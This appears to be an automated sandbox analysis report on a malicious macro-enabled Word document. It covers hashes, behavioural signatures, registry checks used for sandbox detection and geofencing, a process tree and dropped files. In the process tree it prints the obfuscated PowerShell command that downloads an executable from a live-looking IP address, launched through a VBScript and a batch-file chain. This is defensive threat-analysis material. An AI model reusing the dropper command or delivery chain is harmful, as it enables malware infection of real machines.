General
Target

cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm

Filesize

89KB

Completed

21-05-2022 12:29

Task

behavioral2

Score
10/10
MD5

b52f6306e6c5af7bd87fab6f32a937b9

SHA1

e7043e9907b332b9039eeb4487959d10e05d2dc0

SHA256

cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4

SHA256

0f5212be7b3294cb4b86e4f884f9b750a056c34ab9d9df040481d2244659ee2c79c084747ed5cf056ae9d4d3d35563b1901dacfbec464a20ea466029916cc9cb

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://62.108.35.164/api.php

Signatures 13

Filter: none

Discovery
  • Process spawned unexpected child process
    explorer.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    descriptionpidpid_targetprocesstarget process
    Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process40043488explorer.exeWINWORD.EXE
  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flowpidprocess
    483596powershell.exe
  • Checks computer location settings
    WScript.exe

    Description

    Looks up country code configured in the registry, likely geofence.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\NationWScript.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Checks processor information in registry
    WINWORD.EXE

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0WINWORD.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHzWINWORD.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringWINWORD.EXE
  • Delays execution with timeout.exe
    timeout.exe

    Tags

    Reported IOCs

    pidprocess
    1652timeout.exe
  • Enumerates system info in registry
    WINWORD.EXE

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamilyWINWORD.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKUWINWORD.EXE
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\BIOSWINWORD.EXE
  • Modifies registry class
    explorer.exe

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settingsexplorer.exe
  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pidprocess
    3488WINWORD.EXE
    3488WINWORD.EXE
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pidprocess
    3596powershell.exe
    3596powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege3596powershell.exe
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE

    Reported IOCs

    pidprocess
    3488WINWORD.EXE
    3488WINWORD.EXE
    3488WINWORD.EXE
    3488WINWORD.EXE
  • Suspicious use of WriteProcessMemory
    WINWORD.EXEexplorer.exeWScript.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 3488 wrote to memory of 40043488WINWORD.EXEexplorer.exe
    PID 3488 wrote to memory of 40043488WINWORD.EXEexplorer.exe
    PID 100 wrote to memory of 3796100explorer.exeWScript.exe
    PID 100 wrote to memory of 3796100explorer.exeWScript.exe
    PID 3796 wrote to memory of 7603796WScript.execmd.exe
    PID 3796 wrote to memory of 7603796WScript.execmd.exe
    PID 760 wrote to memory of 3596760cmd.exepowershell.exe
    PID 760 wrote to memory of 3596760cmd.exepowershell.exe
    PID 760 wrote to memory of 1652760cmd.exetimeout.exe
    PID 760 wrote to memory of 1652760cmd.exetimeout.exe
Processes 7
  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm" /o ""
    Checks processor information in registry
    Enumerates system info in registry
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:3488
    • C:\Windows\explorer.exe
      explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
      Process spawned unexpected child process
      PID:4004
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Modifies registry class
    Suspicious use of WriteProcessMemory
    PID:100
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3796
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "
        Suspicious use of WriteProcessMemory
        PID:760
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.164/api.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')
          Blocklisted process makes network request
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:3596
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          Delays execution with timeout.exe
          PID:1652
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Persistence
                      Privilege Escalation
                        Replay Monitor
                        00:00 00:00
                        Downloads
                        • C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd

                          MD5

                          197fd11428deaf8779c40b8aee37c023

                          SHA1

                          66d053c6349a994301ba6ec562c7e659f6e60e40

                          SHA256

                          7ede0b864739e9a03678ef876fb0b218b87a7d15f89b2a280989024b739deaf8

                          SHA512

                          ab9b7ad1502532ed065bfa4bcc9e559d3a92bc9be3b46d24b1ba5a32ff7f58f7afa7431314435f434e025f36a8b4272d2a5a3ee4fbfdbeae560f809f978fcfc4

                        • C:\ProgramData\OIUTFuy

                          MD5

                          12a0751c89b3b618b7c91cee7a231878

                          SHA1

                          2d546c942a6626826dc1d76d752cb6bb67546a94

                          SHA256

                          c9a5966dac467eaafd2848273ad734127ba965224225a7e56a02113a1af571bc

                          SHA512

                          aab37a468a8ade701a7c21042df0bca8f58c37223dbf2709285cac863a16b98085f66bd9add1c2480cbdf86781671f1589e4f37b472398de02b1d9dde8ee5fd3

                        • C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs

                          MD5

                          d940788959fad6d9ec52674997f04457

                          SHA1

                          c784384517d2c206c5423a8d58dee5d9ca9c6ffb

                          SHA256

                          46b2da0c04f3b7edb5ab3c1280904dbc645fca003e80a3390e483bde1b80a646

                          SHA512

                          802359aade02f39171298dd57dec02943af22aef5105c9e8e91959b71072258b3e2eff75eda0996c04ab7704ba829ec776f1a6f9673b95cf35a860a7859d5430

                        • memory/760-146-0x0000000000000000-mapping.dmp

                        • memory/1652-151-0x0000000000000000-mapping.dmp

                        • memory/3488-137-0x000001609A390000-0x000001609A394000-memory.dmp

                        • memory/3488-136-0x00007FF823B00000-0x00007FF823B10000-memory.dmp

                        • memory/3488-135-0x00007FF823B00000-0x00007FF823B10000-memory.dmp

                        • memory/3488-134-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

                        • memory/3488-133-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

                        • memory/3488-132-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

                        • memory/3488-131-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

                        • memory/3488-143-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

                        • memory/3488-144-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

                        • memory/3488-145-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

                        • memory/3488-142-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

                        • memory/3488-130-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

                        • memory/3596-148-0x0000000000000000-mapping.dmp

                        • memory/3596-149-0x0000025977970000-0x0000025977992000-memory.dmp

                        • memory/3596-150-0x00007FF847690000-0x00007FF848151000-memory.dmp

                        • memory/3796-140-0x0000000000000000-mapping.dmp

                        • memory/4004-138-0x0000000000000000-mapping.dmp